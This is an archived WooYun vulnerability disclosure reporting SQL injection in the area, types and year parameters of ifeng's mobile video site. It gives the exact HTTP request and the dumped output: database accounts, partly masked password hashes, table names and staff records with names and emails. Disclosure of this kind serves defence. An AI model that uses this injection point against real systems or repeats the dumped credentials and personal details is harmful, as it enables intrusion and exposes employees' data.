乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-23: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-04-02: 细节向核心白帽子及相关领域专家公开 2015-04-12: 细节向普通白帽子公开 2015-04-22: 细节向实习白帽子公开 2015-05-07: 细节向公众公开
手机视频网站:d.tv.ifeng.comarea types year 都有注入
GET /cmppdyn/video_data.jhtml?callback=jsonp1427026276464&types=null&area=&year=&extendParam=&category=2&cb=mycallbacks&index=0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Accept: text/javascript, application/javascript, */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestCache-Control: no-cacheHost: d.tv.ifeng.comAccept-Encoding: gzip, deflate
请允许我贴出打码数据
database management system users [8]:[*] ''@'localhost'[*] 'cmpp_onlyread'@'%'[*] 'cmppdev'@'%'[*] 'repl'@'%'[*] 'root'@'127.0.0.1'[*] 'root'@'::1'[*] 'root'@'localhost'[*] 'zabbix'@'127.0.0.1'database management system users password hashes:[*] cmpp_onlyread [1]: password hash: *FF99CFC1686F77B9606mask[*] cmppdev [1]: password hash: *E9FEF22CC7DA68764F36mask[*] repl [1]: password hash: *36CBA12C46297F1E9802A82mask[*] root [1]: password hash: *56ED6C82E9688F108281CA1580Cmask password hash: *531C28D790735ABC95Dmask
Database: v_ifeng[209 tables]+-------------------------+| cmpp_authority || cmpp_banner || cmpp_data_relation || cmpp_dynPageStatus || cmpp_dynamic2Config || cmpp_dynamic2Page || cmpp_dynamicConfig || cmpp_dynamicConfig_copy || cmpp_dynamicPage || cmpp_dynamic_r || cmpp_formConfig || cmpp_group || cmpp_idx || cmpp_idxType || cmpp_interface || cmpp_listConfig || cmpp_message || cmpp_monitor_err || cmpp_monitor_log || cmpp_monitor_task || cmpp_node || cmpp_resource_file || cmpp_resource_folder || cmpp_script || cmpp_source || cmpp_source_subscribe || cmpp_tagParser || cmpp_task || cmpp_template || cmpp_user || cmpp_user_group || cmpp_v_cp_tmp || cmpp_version || cmpp_viewConfig || cmpp_wf_activity_def || cmpp_wf_plugin_def || cmpp_wf_plugin_status || cmpp_wf_process_context || cmpp_wf_process_def || frm_113 || frm_114 || frm_115 || frm_119 || frm_120 || frm_122 || frm_129 || frm_130 || frm_131 || frm_132 || frm_133 || frm_134 || frm_135 || frm_136 || frm_137 || frm_138 || frm_139 || frm_140 || frm_141 || frm_142 || frm_143 || frm_144 || frm_145 || frm_146 || frm_147 || frm_148 || frm_149 |.....................
Database: v_ifengTable: cmpp_user[551 entries]id,dept,email,cnname,username,telphone,password,sAMAccountName2,运营技术开发组,[email protected],程邓时,chengds,xx3,运营技术开发组,[email protected],杨俊杰,yangjj,xx
找漏洞真心不容易,求rank ^_^
危害等级:高
漏洞Rank:13
确认时间:2015-03-23 23:24
非常感谢您对凤凰网信息安全的帮助。
暂无